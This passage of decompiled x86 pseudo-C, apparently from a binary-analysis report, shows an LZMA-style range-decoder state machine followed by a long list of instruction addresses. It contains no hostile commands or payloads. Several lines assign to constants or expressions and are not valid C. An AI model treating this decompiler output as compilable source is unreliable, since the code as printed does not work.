                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												 *(__ebp - 0x40) = 1;
                                                            												__cx = __ax >> 5;
                                                            												__eflags = __eax;
                                                            												__ebx = __ebx + __ebx + 1;
                                                            												 *__esi = __ax;
                                                            											} else {
                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edx;
                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            												__ebx = __ebx + __ebx;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											 *(__ebp - 0x44) = __ebx;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L39;
                                                            											} else {
                                                            												goto L37;
                                                            											}
                                                            										case 0xe:
                                                            											L46:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xe;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t156 = __ebp - 0x70;
                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t156;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											while(1) {
                                                            												L48:
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													break;
                                                            												}
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__edx = __ebx + __ebx;
                                                            												__ecx =  *(__ebp - 0x10);
                                                            												__esi = __edx + __eax;
                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													_t170 = __edx + 1; // 0x1
                                                            													__ebx = _t170;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													continue;
                                                            												} else {
                                                            													goto L46;
                                                            												}
                                                            											}
                                                            											L54:
                                                            											_t173 = __ebp - 0x34;
                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                            											__eflags =  *_t173;
                                                            											goto L55;
                                                            										case 0xf:
                                                            											L58:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xf;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t203 = __ebp - 0x70;
                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t203;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L60:
                                                            											__eflags = __ebx - 0x100;
                                                            											if(__ebx >= 0x100) {
                                                            												L55:
                                                            												__al =  *(__ebp - 0x44);
                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            												goto L56;
                                                            											}
                                                            											L61:
                                                            											__eax =  *(__ebp - 0x58);
                                                            											__edx = __ebx + __ebx;
                                                            											__ecx =  *(__ebp - 0x10);
                                                            											__esi = __edx + __eax;
                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            											__ax =  *__esi;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__edi = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												_t217 = __edx + 1; // 0x1
                                                            												__ebx = _t217;
                                                            												__cx = __ax >> 5;
                                                            												__eflags = __eax;
                                                            												 *__esi = __ax;
                                                            											} else {
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edi;
                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            												__ebx = __ebx + __ebx;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											 *(__ebp - 0x44) = __ebx;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L60;
                                                            											} else {
                                                            												goto L58;
                                                            											}
                                                            										case 0x10:
                                                            											L110:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0x10;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t366 = __ebp - 0x70;
                                                            											 *_t366 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t366;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											goto L112;
                                                            										case 0x11:
                                                            											L69:
                                                            											__esi =  *(__ebp - 0x58);
                                                            											 *(__ebp - 0x84) = 0x12;
                                                            											L132:
                                                            											 *(_t612 - 0x54) = _t605;
                                                            											goto L133;
                                                            										case 0x12:
                                                            											goto L0;
                                                            										case 0x13:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												_t469 = __ebp - 0x58;
                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            												__eflags =  *_t469;
                                                            												 *(__ebp - 0x30) = 0x10;
                                                            												 *(__ebp - 0x40) = 8;
                                                            												goto L144;
                                                            											}
                                                            											__eax =  *(__ebp - 0x4c);
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                            											 *(__ebp - 0x30) = 8;
                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            											goto L130;
                                                            										case 0x14:
                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            											__eax =  *(__ebp - 0x80);
                                                            											L140:
                                                            											 *(_t612 - 0x88) = _t533;
                                                            											goto L1;
                                                            										case 0x15:
                                                            											__eax = 0;
                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            											__al = __al & 0x000000fd;
                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            											goto L121;
                                                            										case 0x16:
                                                            											__eax =  *(__ebp - 0x30);
                                                            											__eflags = __eax - 4;
                                                            											if(__eax >= 4) {
                                                            												_push(3);
                                                            												_pop(__eax);
                                                            											}
                                                            											__ecx =  *(__ebp - 4);
                                                            											 *(__ebp - 0x40) = 6;
                                                            											__eax = __eax << 7;
                                                            											 *(__ebp - 0x7c) = 0x19;
                                                            											 *(__ebp - 0x58) = __eax;
                                                            											goto L145;
                                                            										case 0x17:
                                                            											goto L145;
                                                            										case 0x18:
                                                            											L146:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0x18;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t484 = __ebp - 0x70;
                                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t484;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L148:
                                                            											_t487 = __ebp - 0x48;
                                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                                            											__eflags =  *_t487;
                                                            											goto L149;
                                                            										case 0x19:
                                                            											__eflags = __ebx - 4;
                                                            											if(__ebx < 4) {
                                                            												 *(__ebp - 0x2c) = __ebx;
                                                            												L120:
                                                            												_t394 = __ebp - 0x2c;
                                                            												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                            												__eflags =  *_t394;
                                                            												L121:
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												__eflags = __eax;
                                                            												if(__eax == 0) {
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            													goto L170;
                                                            												}
                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                            													goto L171;
                                                            												}
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            												__eax =  *(__ebp - 0x30);
                                                            												_t401 = __ebp - 0x60;
                                                            												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            												__eflags =  *_t401;
                                                            												goto L124;
                                                            											}
                                                            											__ecx = __ebx;
                                                            											__eax = __ebx;
                                                            											__ecx = __ebx >> 1;
                                                            											__eax = __ebx & 0x00000001;
                                                            											__ecx = (__ebx >> 1) - 1;
                                                            											__al = __al | 0x00000002;
                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                            											__eflags = __ebx - 0xe;
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											if(__ebx >= 0xe) {
                                                            												__ebx = 0;
                                                            												 *(__ebp - 0x48) = __ecx;
                                                            												L103:
                                                            												__eflags =  *(__ebp - 0x48);
                                                            												if( *(__ebp - 0x48) <= 0) {
                                                            													__eax = __eax + __ebx;
                                                            													 *(__ebp - 0x40) = 4;
                                                            													 *(__ebp - 0x2c) = __eax;
                                                            													__eax =  *(__ebp - 4);
                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                            													__eflags = __eax;
                                                            													L109:
                                                            													__ebx = 0;
                                                            													 *(__ebp - 0x58) = __eax;
                                                            													 *(__ebp - 0x50) = 1;
                                                            													 *(__ebp - 0x44) = 0;
                                                            													 *(__ebp - 0x48) = 0;
                                                            													L113:
                                                            													__eax =  *(__ebp - 0x40);
                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            														_t392 = __ebp - 0x2c;
                                                            														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                            														__eflags =  *_t392;
                                                            														goto L120;
                                                            													}
                                                            													__eax =  *(__ebp - 0x50);
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            													__eax =  *(__ebp - 0x58);
                                                            													__esi = __edi + __eax;
                                                            													 *(__ebp - 0x54) = __esi;
                                                            													__ax =  *__esi;
                                                            													__ecx = __ax & 0x0000ffff;
                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                            														__ecx = 0;
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            														__ecx = 1;
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            														__ebx = 1;
                                                            														__ecx =  *(__ebp - 0x48);
                                                            														__ebx = 1 << __cl;
                                                            														__ecx = 1 << __cl;
                                                            														__ebx =  *(__ebp - 0x44);
                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                            														__cx = __ax;
                                                            														__cx = __ax >> 5;
                                                            														__eax = __eax - __ecx;
                                                            														__edi = __edi + 1;
                                                            														__eflags = __edi;
                                                            														 *(__ebp - 0x44) = __ebx;
                                                            														 *__esi = __ax;
                                                            														 *(__ebp - 0x50) = __edi;
                                                            													} else {
                                                            														 *(__ebp - 0x10) = __edx;
                                                            														0x800 = 0x800 - __ecx;
                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            														 *__esi = __dx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														L112:
                                                            														_t369 = __ebp - 0x48;
                                                            														 *_t369 =  *(__ebp - 0x48) + 1;
                                                            														__eflags =  *_t369;
                                                            														goto L113;
                                                            													} else {
                                                            														goto L110;
                                                            													}
                                                            												}
                                                            												__ecx =  *(__ebp - 0xc);
                                                            												__ebx = __ebx + __ebx;
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            													__ecx =  *(__ebp - 0x10);
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            													__ebx = __ebx | 0x00000001;
                                                            													__eflags = __ebx;
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													L102:
                                                            													_t339 = __ebp - 0x48;
                                                            													 *_t339 =  *(__ebp - 0x48) - 1;
                                                            													__eflags =  *_t339;
                                                            													goto L103;
                                                            												} else {
                                                            													goto L100;
                                                            												}
                                                            											}
                                                            											__edx =  *(__ebp - 4);
                                                            											__eax = __eax - __ebx;
                                                            											 *(__ebp - 0x40) = __ecx;
                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            											goto L109;
                                                            										case 0x1a:
                                                            											L56:
                                                            											__eflags =  *(__ebp - 0x64);
                                                            											if( *(__ebp - 0x64) == 0) {
                                                            												 *(__ebp - 0x88) = 0x1a;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x68);
                                                            											__al =  *(__ebp - 0x5c);
                                                            											__edx =  *(__ebp - 8);
                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            											 *( *(__ebp - 0x68)) = __al;
                                                            											__ecx =  *(__ebp - 0x14);
                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                            											__eax = __ecx + 1;
                                                            											__edx = 0;
                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                            											__edx = _t192;
                                                            											goto L80;
                                                            										case 0x1b:
                                                            											L76:
                                                            											__eflags =  *(__ebp - 0x64);
                                                            											if( *(__ebp - 0x64) == 0) {
                                                            												 *(__ebp - 0x88) = 0x1b;
                                                            												goto L170;
                                                            											}
                                                            											__eax =  *(__ebp - 0x14);
                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                            												__eflags = __eax;
                                                            											}
                                                            											__edx =  *(__ebp - 8);
                                                            											__cl =  *(__eax + __edx);
                                                            											__eax =  *(__ebp - 0x14);
                                                            											 *(__ebp - 0x5c) = __cl;
                                                            											 *(__eax + __edx) = __cl;
                                                            											__eax = __eax + 1;
                                                            											__edx = 0;
                                                            											_t275 = __eax %  *(__ebp - 0x74);
                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                            											__edx = _t275;
                                                            											__eax =  *(__ebp - 0x68);
                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            											_t284 = __ebp - 0x64;
                                                            											 *_t284 =  *(__ebp - 0x64) - 1;
                                                            											__eflags =  *_t284;
                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                            											L80:
                                                            											 *(__ebp - 0x14) = __edx;
                                                            											goto L81;
                                                            										case 0x1c:
                                                            											while(1) {
                                                            												L124:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													break;
                                                            												}
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__edx =  *(__ebp - 8);
                                                            												__cl =  *(__eax + __edx);
                                                            												__eax =  *(__ebp - 0x14);
                                                            												 *(__ebp - 0x5c) = __cl;
                                                            												 *(__eax + __edx) = __cl;
                                                            												__eax = __eax + 1;
                                                            												__edx = 0;
                                                            												_t415 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t415;
                                                            												__eax =  *(__ebp - 0x68);
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            												__eflags =  *(__ebp - 0x30);
                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                            												 *(__ebp - 0x14) = _t415;
                                                            												if( *(__ebp - 0x30) > 0) {
                                                            													continue;
                                                            												} else {
                                                            													L81:
                                                            													 *(__ebp - 0x88) = 2;
                                                            													goto L1;
                                                            												}
                                                            											}
                                                            											 *(__ebp - 0x88) = 0x1c;
                                                            											L170:
                                                            											_push(0x22);
                                                            											_pop(_t567);
                                                            											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                            											_t535 = 0;
                                                            											L172:
                                                            											return _t535;
                                                            									}
                                                            								}
                                                            								L171:
                                                            								_t535 = _t534 | 0xffffffff;
                                                            								goto L172;
                                                            							}
                                                            						}
                                                            						__eax =  *(__ebp - 0x50);
                                                            						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            						__eax =  *(__ebp - 0x58);
                                                            						__esi = __edx + __eax;
                                                            						 *(__ebp - 0x54) = __esi;
                                                            						__ax =  *__esi;
                                                            						__edi = __ax & 0x0000ffff;
                                                            						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            						if( *(__ebp - 0xc) >= __ecx) {
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            							__cx = __ax;
                                                            							__cx = __ax >> 5;
                                                            							__eax = __eax - __ecx;
                                                            							__edx = __edx + 1;
                                                            							 *__esi = __ax;
                                                            							 *(__ebp - 0x50) = __edx;
                                                            						} else {
                                                            							 *(__ebp - 0x10) = __ecx;
                                                            							0x800 = 0x800 - __edi;
                                                            							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            							 *__esi = __cx;
                                                            						}
                                                            						if( *(__ebp - 0x10) >= 0x1000000) {
                                                            							goto L148;
                                                            						} else {
                                                            							goto L146;
                                                            						}
                                                            					}
                                                            					goto L1;
                                                            				}
                                                            			}








                                                            0x00000000
                                                            0x004068ee
                                                            0x004068ee
                                                            0x004068f2
                                                            0x00406917
                                                            0x00406921
                                                            0x00000000
                                                            0x004068f4
                                                            0x004068f4
                                                            0x004068f7
                                                            0x004068fb
                                                            0x004068fe
                                                            0x00406901
                                                            0x00406905
                                                            0x00406905
                                                            0x00406908
                                                            0x004069e2
                                                            0x004069e2
                                                            0x004069e9
                                                            0x004069e9
                                                            0x004069ec
                                                            0x004069f3
                                                            0x00406a20
                                                            0x00406a24
                                                            0x00406a84
                                                            0x00406a87
                                                            0x00406a8c
                                                            0x00406a8d
                                                            0x00406a8f
                                                            0x00406a91
                                                            0x00406a94
                                                            0x004069a0
                                                            0x004069a0
                                                            0x004069a0
                                                            0x0040613c
                                                            0x0040613c
                                                            0x0040613c
                                                            0x00406145
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b
                                                            0x00000000
                                                            0x00406156
                                                            0x00000000
                                                            0x00000000
                                                            0x0040615f
                                                            0x00406162
                                                            0x00406165
                                                            0x00406169
                                                            0x00000000
                                                            0x00000000
                                                            0x0040616f
                                                            0x00406172
                                                            0x00406174
                                                            0x00406175
                                                            0x00406178
                                                            0x0040617a
                                                            0x0040617b
                                                            0x0040617d
                                                            0x00406180
                                                            0x00406185
                                                            0x0040618a
                                                            0x00406193
                                                            0x004061a6
                                                            0x004061a9
                                                            0x004061b5
                                                            0x004061dd
                                                            0x004061df
                                                            0x004061ed
                                                            0x004061ed
                                                            0x004061f1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061e1
                                                            0x004061e4
                                                            0x004061e5
                                                            0x004061e5
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061bb
                                                            0x004061c0
                                                            0x004061c0
                                                            0x004061c9
                                                            0x004061d1
                                                            0x004061d4
                                                            0x00000000
                                                            0x004061da
                                                            0x004061da
                                                            0x00000000
                                                            0x004061da
                                                            0x00000000
                                                            0x004061f7
                                                            0x004061f7
                                                            0x004061fb
                                                            0x00406aa7
                                                            0x00000000
                                                            0x00406aa7
                                                            0x00406204
                                                            0x00406214
                                                            0x00406217
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621d
                                                            0x00406221
                                                            0x00000000
                                                            0x00000000
                                                            0x00406223
                                                            0x00406229
                                                            0x00406253
                                                            0x00406259
                                                            0x00406260
                                                            0x00000000
                                                            0x00406260
                                                            0x0040622f
                                                            0x00406232
                                                            0x00406237
                                                            0x00406237
                                                            0x00406242
                                                            0x0040624a
                                                            0x0040624d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406292
                                                            0x00406298
                                                            0x0040629b
                                                            0x004062a8
                                                            0x004062b0
                                                            0x00000000
                                                            0x00000000
                                                            0x00406267
                                                            0x00406267
                                                            0x0040626b
                                                            0x00406ab6
                                                            0x00000000
                                                            0x00406ab6
                                                            0x00406277
                                                            0x00406282
                                                            0x00406282
                                                            0x00406282
                                                            0x00406285
                                                            0x00406288
                                                            0x0040628b
                                                            0x00406290
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406927
                                                            0x00406927
                                                            0x0040692d
                                                            0x00406933
                                                            0x00406939
                                                            0x00406953
                                                            0x00406956
                                                            0x0040695c
                                                            0x00406967
                                                            0x00406967
                                                            0x00406969
                                                            0x0040693b
                                                            0x0040693b
                                                            0x0040694a
                                                            0x0040694e
                                                            0x0040694e
                                                            0x00406973
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406975
                                                            0x00406979
                                                            0x00406b28
                                                            0x00000000
                                                            0x00406b28
                                                            0x00406985
                                                            0x0040698c
                                                            0x00406994
                                                            0x00406997
                                                            0x0040699a
                                                            0x0040699a
                                                            0x00000000
                                                            0x00000000
                                                            0x004062b8
                                                            0x004062ba
                                                            0x004062bd
                                                            0x0040632e
                                                            0x00406331
                                                            0x00406334
                                                            0x0040633b
                                                            0x00406345
                                                            0x00000000
                                                            0x00406345
                                                            0x004062bf
                                                            0x004062c3
                                                            0x004062c6
                                                            0x004062c8
                                                            0x004062cb
                                                            0x004062ce
                                                            0x004062d0
                                                            0x004062d3
                                                            0x004062d5
                                                            0x004062da
                                                            0x004062dd
                                                            0x004062e0
                                                            0x004062e4
                                                            0x004062eb
                                                            0x004062ee
                                                            0x004062f5
                                                            0x004062f9
                                                            0x00406301
                                                            0x00406301
                                                            0x00406301
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062f0
                                                            0x004062f0
                                                            0x004062f0
                                                            0x00406305
                                                            0x00406308
                                                            0x00406326
                                                            0x00406328
                                                            0x00000000
                                                            0x0040630a
                                                            0x0040630a
                                                            0x0040630d
                                                            0x00406310
                                                            0x00406313
                                                            0x00406315
                                                            0x00406315
                                                            0x00406315
                                                            0x00406318
                                                            0x0040631b
                                                            0x0040631d
                                                            0x0040631e
                                                            0x00406321
                                                            0x00000000
                                                            0x00406321
                                                            0x00000000
                                                            0x00406557
                                                            0x0040655b
                                                            0x00406579
                                                            0x0040657c
                                                            0x00406583
                                                            0x00406586
                                                            0x00406589
                                                            0x0040658c
                                                            0x0040658f
                                                            0x00406592
                                                            0x00406594
                                                            0x0040659b
                                                            0x0040659c
                                                            0x0040659e
                                                            0x004065a1
                                                            0x004065a4
                                                            0x004065a7
                                                            0x004065a7
                                                            0x004065ac
                                                            0x00000000
                                                            0x004065ac
                                                            0x0040655d
                                                            0x00406560
                                                            0x00406563
                                                            0x0040656d
                                                            0x00000000
                                                            0x00000000
                                                            0x004065c1
                                                            0x004065c5
                                                            0x004065e8
                                                            0x004065eb
                                                            0x004065ee
                                                            0x004065f8
                                                            0x004065c7
                                                            0x004065c7
                                                            0x004065ca
                                                            0x004065cd
                                                            0x004065d0
                                                            0x004065dd
                                                            0x004065e0
                                                            0x004065e0
                                                            0x00000000
                                                            0x00000000
                                                            0x00406604
                                                            0x00406608
                                                            0x00000000
                                                            0x00000000
                                                            0x0040660e
                                                            0x00406612
                                                            0x00000000
                                                            0x00000000
                                                            0x00406618
                                                            0x0040661a
                                                            0x0040661e
                                                            0x0040661e
                                                            0x00406621
                                                            0x00406625
                                                            0x00000000
                                                            0x00000000
                                                            0x00406675
                                                            0x00406679
                                                            0x00406680
                                                            0x00406683
                                                            0x00406686
                                                            0x00406690
                                                            0x00000000
                                                            0x00406690
                                                            0x0040667b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040669c
                                                            0x004066a0
                                                            0x004066a7
                                                            0x004066aa
                                                            0x004066ad
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066b0
                                                            0x004066b3
                                                            0x004066b6
                                                            0x004066b6
                                                            0x004066b9
                                                            0x004066bc
                                                            0x004066bf
                                                            0x004066bf
                                                            0x004066c2
                                                            0x004066c9
                                                            0x004066ce
                                                            0x00000000
                                                            0x00000000
                                                            0x0040675c
                                                            0x0040675c
                                                            0x00406760
                                                            0x00406afe
                                                            0x00000000
                                                            0x00406afe
                                                            0x00406766
                                                            0x00406769
                                                            0x0040676c
                                                            0x00406770
                                                            0x00406773
                                                            0x00406779
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677e
                                                            0x00406781
                                                            0x00000000
                                                            0x00000000
                                                            0x00406351
                                                            0x00406351
                                                            0x00406355
                                                            0x00406ac2
                                                            0x00000000
                                                            0x00406ac2
                                                            0x0040635b
                                                            0x0040635e
                                                            0x00406361
                                                            0x00406365
                                                            0x00406368
                                                            0x0040636e
